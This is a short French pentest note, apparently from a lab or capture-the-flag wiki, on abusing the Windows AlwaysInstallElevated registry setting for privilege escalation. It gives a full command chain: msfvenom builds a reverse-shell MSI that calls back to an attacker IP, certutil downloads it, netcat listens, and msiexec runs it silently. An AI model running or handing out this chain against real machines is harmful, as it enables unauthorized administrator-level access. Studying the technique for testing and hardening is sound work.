AlwaysInstallElevated - Active Directory Exploitation

AlwaysInstallElevated est une fonctionnalité de Windows qui, lorsqu'elle est activée, permet à tous les utilisateurs d'installer des packages MSI avec des privilèges administratifs, même s'ils ne sont pas membres du groupe Administrateurs. Cette option est souvent utilisée pour faciliter les déploiements de logiciels dans un environnement d'entreprise. Cependant, elle représente un risque de sécurité majeur, car elle permet à un utilisateur non privilégié d'exécuter des fichiers MSI malveillants avec des droits d'administrateur, facilitant ainsi l'escalade de privilèges et l'exécution de code malveillant sur le système. Il est donc recommandé de désactiver cette option pour renforcer la sécurité.

Nous nous intéressons particulièrement à la clé de registre AlwaysInstallElevated. Si cette clé est définie sur 1 dans HKLM (HKEY_LOCAL_MACHINE), cela indique que tous les fichiers .msi peuvent être installés avec des privilèges élevés, ce qui constitue une vulnérabilité.

Création d'un fichier .msi pour obtenir un reverse shell

Pour tirer parti de cette vulnérabilité, nous allons créer un fichier .msi qui, une fois exécuté, nous fournira un reverse shell. Nous utilisons msfvenom pour générer ce fichier :

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 --platform windows -a x64 -f msi -o reverse.msi

Transfert du fichier .msi Après avoir créé le fichier, nous devons le transférer sur la machine cible :

certutil.exe -f -urlcache -split http://10.10.14.10/reverse.msi reverse.msi

Écoute sur le port 443 Avant d'exécuter le fichier .msi, nous devons nous mettre en écoute sur le port que nous avons spécifié. Utilisons nc (netcat) pour cela :

rlwrap nc -nlvp 443

Exécution de la commande d'installation Enfin, nous exécutons le fichier .msi en utilisant msiexec, ce qui déclenche l'installation silencieuse :

msiexec /quiet /qn /i reverse.msi

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?